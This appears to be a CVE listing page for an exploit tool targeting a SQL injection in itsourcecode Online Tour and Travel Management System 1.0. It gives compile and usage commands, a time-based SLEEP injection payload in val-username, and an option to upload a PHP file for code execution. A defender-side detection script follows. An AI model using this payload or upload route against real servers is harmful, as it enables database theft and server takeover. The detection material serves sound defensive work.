
CVE-2025-8971 PoC: itsourcecode Online Tour and Travel Management System injection vulnerability

Related vulnerability
Title: itsourcecode Online Tour and Travel Management System injection vulnerability (CVE-2025-8971)
Description: itsourcecode Online Tour and Travel Management System is an open-source online tour and travel management system from itsourcecode. Version 1.0 contains an injection vulnerability: improper handling of the val-username parameter in the file /admin/operations/travellers.php leads to SQL injection.
Description
SQL injection in itsourcecode Online Tour and Travel Management System 1.0.
Introduction
# CVE-2025-8971 (SQL Injection)

**Author: Byte Reaper**

## Description :
This is an exploit for CVE-2025-8971, a SQL injection vulnerability in itsourcecode Online Tour and Travel Management System 1.0.
The vulnerability exists in /admin/operations/travellers.php and can be exploited remotely via the val-username parameter.

## How It Works

The exploit sends crafted HTTP POST requests to the target URL.

Payloads are encoded and injected into val-username.

Optional file upload (.php or image) can be used to achieve remote code execution.

The script verifies responses to check if the payload was successfully executed.

## Requirements : 
```
GCC compiler (gcc)

Linux x86_64 

libcurl
```


## Compilation : 
```
    gcc script.c argparse.c -o CVE-2025-8971 -lcurl
    ./CVE-2025-8971 -u http://<target> -v [verbose mode]
```

## Usage:
```
    -h, --help            help message 
    -u, --url             Target Url (BASE URL)
    -c, --cookies         File cookies
    -i, --ip              Fake Ip (Host request)
    -f, --file            File upload (.php / image)
    -v, --verbose         Verbose Mode
```
## Example Run : 
```
[+] Start encode Payload in Request (username=)
[+] Encode Payload : AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))bAKL)%20AND%20'b'='b'
[+] Original Payload (Not encode) : AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'b'='b'
[+] POST Request Sent
[+] FULL URL : http://127.0.0.1/code/admin/operations/travellers.php
[+] File Upload : test.php
[+] File written successfully
....
```
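
A defender-side check for the request shown in the example run, added here and not part of the original repository or exploit: it percent-decodes the form body (including double encoding) and flags SQL constructs in `val-username` on POST requests to `/admin/operations/travellers.php`. The rule names, function names and sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path and parameter come from the advisory text; everything else is assumed.
TARGET_PATH = "/admin/operations/travellers.php"
PARAM = "val-username"

# SQL constructs that have no place in a username field.
RULES = [
    ("time-delay", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("subquery", re.compile(r"\(\s*select\b", re.I)),
    ("union-select", re.compile(r"\bunion\b.+?\bselect\b", re.I | re.S)),
    ("tautology", re.compile(r"\b(and|or)\b\s+'?\w+'?\s*=\s*'?\w+'?", re.I)),
]

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding so double-encoded input is still inspected."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(method, url, body):
    """Return the names of the rules matched by one request (empty list = clean)."""
    if method.upper() != "POST" or not urlsplit(url).path.endswith(TARGET_PATH):
        return []
    hits = []
    # parse_qs performs the first round of percent-decoding on each value.
    for raw in parse_qs(body, keep_blank_values=True).get(PARAM, []):
        value = decode_fully(raw)
        hits += [name for name, rx in RULES if rx.search(value) and name not in hits]
    return hits

# Constructed sample requests (method, URL, form body). The second body carries
# the encoded payload printed in the example run; the third encodes it twice.
PAGE_PAYLOAD = "AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))bAKL)%20AND%20'b'='b'"
TARGET_URL = "http://127.0.0.1/code/admin/operations/travellers.php"
SAMPLES = [
    ("POST", TARGET_URL, "val-username=alice"),
    ("POST", TARGET_URL, "val-username=" + PAGE_PAYLOAD),
    ("POST", TARGET_URL, "val-username=" + PAGE_PAYLOAD.replace("%", "%25")),
    ("GET", "http://127.0.0.1/code/index.php", ""),
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        print(method, urlsplit(url).path, inspect_request(method, url, body) or "clean")
```

Pattern matching of this kind is a detection aid for logs or a request filter; the fix for the flaw itself is to bind `val-username` as a parameter in a prepared statement.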

## License :

MIT License
File snapshot

```
[4.0K] /data/pocs/59f823a95b8acadb28e89d6196d8996905920790
├── [1.0K] LICENSE
├── [1.6K] README.md
└── [ 24K] script.c

0 directories, 3 files
```